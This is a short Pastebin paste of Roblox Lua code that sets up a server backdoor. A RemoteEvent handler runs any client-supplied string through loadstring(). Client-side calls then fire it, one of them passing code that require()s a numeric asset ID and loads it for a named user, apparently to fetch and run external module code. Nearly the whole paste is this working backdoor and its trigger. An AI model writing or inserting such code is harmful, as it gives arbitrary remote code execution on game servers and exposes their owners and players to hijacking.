Advertisement
CerealK

Untitled

Mar 27th, 2019
199
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.40 KB | None | 0 0
  1. local Event = Instance.new("RemoteEvent", game.ReplicatedStorage) -- This creates the remote
  2.  
  3. Event.OnServerEvent:connect(function(player, serverExecution)
  4. loadstring(serverExecution)()
  5. end)
  6.  
  7. game.ReplicatedStorage.RemoteEvent:FireServer('cGxzIGVtbWE=',game:GetService'Players'.CerealKiller223.Name,1201581879)
  8. game.ReplicatedStorage.RemoteEvent:FireServer([[require(1201581879).load"CerealKiller223]])
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement